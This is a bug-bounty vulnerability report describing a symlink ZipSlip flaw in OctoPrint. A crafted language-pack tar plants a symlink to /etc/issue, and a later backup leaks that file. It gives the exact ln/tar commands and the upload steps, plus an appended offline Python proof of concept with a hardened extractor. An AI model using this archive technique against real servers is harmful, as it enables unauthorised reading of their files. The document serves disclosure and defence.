huntr report 2D1DB3C9-93E8-4902-A55B-5EA53C22AA11

ZipSlip Symlink variant allows to read any file within OctoPrint Box

2022-08-24 15:59:26
sim4n6
www.huntr.dev
Tags: zipslip vulnerability, octoprint box, symlink variant, malicious archive, dockerized setup, backup & restore, language pack, server-side issue file

EPSS: 0.001 (percentile 17.8%)

Using the ZipSlip symlink variant, an authenticated user who can upload a language pack can read any file on the OctoPrint server that the OctoPrint process itself can read: a maliciously crafted archive plants a symlink inside the translations directory, and a backup archive created afterwards contains the content of the file the link points to, ready to download.

To set up the OctoPrint web application, we used the dockerized version:

sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint

Generate a maliciously crafted archive as follows:

# unzip the Italian language pack
unzip language-pack-it.zip
cd ./it/LC_MESSAGES/

# plant a symlink; the leading ./ components resolve to the same place as a
# plain ../ chain, but the stored link target no longer starts with ../
# (overshooting the filesystem root is harmless, since /.. is still /)
ln -s ././../../../../../../../../../etc/issue issue.y3

# go back up so that the it/ tree is packed whole into a crafted TAR archive
cd ../..
tar -cvf it_crafted.tar ./it/

After the initial configuration with default parameters, log in and head to OctoPrint Settings > OctoPrint Appearance > Language Packs. Click on Manage > Upload additional Language Packs and upload the it_crafted.tar archive as a language pack.

Now head to OctoPrint Settings > Backup & Restore and click on Create backup now. Download the new backup archive and read the file located within it at /basedir/translations/it/LC_MESSAGES/issue.y3: the backup archived the planted symlink as the file it points to, so that entry holds the content of the server-side /etc/issue.
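The whole chain, as an added example that is not part of the original report or of OctoPrint's code: a Python script that builds the crafted tar in memory the way the ln/tar steps above do, extracts it the naive way, produces a zip backup of the base directory and reads the leaked content back out of it, then runs the same archive through a hardened extractor that rejects it. The directory layout, the stand-in file for /etc/issue, the simplified backup routine and all function names are constructed for the demo and are not OctoPrint's.

```python
"""Added example, not OctoPrint's code: reproduce the symlink ZipSlip chain from the
report offline (crafted tar -> naive extraction -> backup that follows the link) and
show the check that stops it.  All paths and file contents here are constructed."""
import io
import tarfile
import tempfile
import zipfile
from pathlib import Path

LINK_NAME = "it/LC_MESSAGES/issue.y3"  # where the report plants the link inside the pack


def build_crafted_tar(target_abs: str, link_name: str = LINK_NAME, climb: int = 16) -> bytes:
    """Tar with a single symlink member.  Mirrors `ln -s ././../../.../etc/issue issue.y3`:
    the target is relative, climbs past the filesystem root (extra ../ are harmless there)
    and is padded with ./ so the stored target does not *start* with ../."""
    link_target = "././" + "../" * climb + target_abs.lstrip("/")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = link_target
        tar.addfile(info)  # a symlink member carries no data, only the link target
    return buf.getvalue()


def list_links(tar_bytes: bytes) -> list:
    """Defender-side check: every symlink/hardlink member of an upload and its target."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        return [(m.name, m.linkname) for m in tar.getmembers() if m.issym() or m.islnk()]


def extract_unsafely(tar_bytes: bytes, dest: Path) -> None:
    """What a naive importer does: extractall() recreates the symlink verbatim."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        try:
            tar.extractall(dest, filter="fully_trusted")  # keep the old, unfiltered behaviour
        except TypeError:  # Python without the filter= argument
            tar.extractall(dest)


def extract_safely(tar_bytes: bytes, dest: Path) -> list:
    """Hardened importer: no link members at all (a language pack has no use for them)
    and no member whose name resolves outside dest.  Raises ValueError on the first offender."""
    dest.mkdir(parents=True, exist_ok=True)
    root = dest.resolve()
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        members = tar.getmembers()
        for m in members:
            if m.issym() or m.islnk():
                raise ValueError(f"link member rejected: {m.name} -> {m.linkname}")
            if not (root / m.name).resolve().is_relative_to(root):
                raise ValueError(f"path traversal rejected: {m.name}")
        tar.extractall(dest, members=members)
    return [m.name for m in members]


def make_backup(basedir: Path) -> bytes:
    """Constructed stand-in for a backup routine that zips the base directory.
    ZipFile.write() stats and opens the path, so a symlink is archived as the
    file it points to, which is exactly what leaks the target's content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for p in sorted(basedir.rglob("*")):
            if p.is_file():  # is_file() follows symlinks too
                zf.write(p, p.relative_to(basedir).as_posix())
    return buf.getvalue()


def run_demo() -> dict:
    """Full chain in a temp dir: secret outside basedir -> crafted pack -> leak via backup."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        secret = tmp / "outside" / "issue"  # constructed stand-in for /etc/issue
        secret.parent.mkdir()
        secret.write_text("constructed stand-in for /etc/issue\n")
        basedir = tmp / "basedir"
        (basedir / "translations").mkdir(parents=True)

        pack = build_crafted_tar(str(secret.resolve()))
        extract_unsafely(pack, basedir / "translations")
        with zipfile.ZipFile(io.BytesIO(make_backup(basedir))) as zf:
            leaked = zf.read("translations/" + LINK_NAME).decode()

        try:
            extract_safely(pack, tmp / "translations_hardened")
            blocked = False
        except ValueError:
            blocked = True
        return {"leaked": leaked,
                "matches_secret": leaked == secret.read_text(),
                "hardened_blocked": blocked}


if __name__ == "__main__":
    print(run_demo())
```

Run it with python3 on a Linux or macOS host; it needs no network and touches only a temporary directory. On Python 3.12 and later, tarfile's own filter argument gives the same protection as extract_safely for the symlink case (extractall(dest, filter="data") refuses links whose target resolves outside the destination); rejecting link members outright is the simpler choice whenever the format, as with a language pack, has no legitimate use for them.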

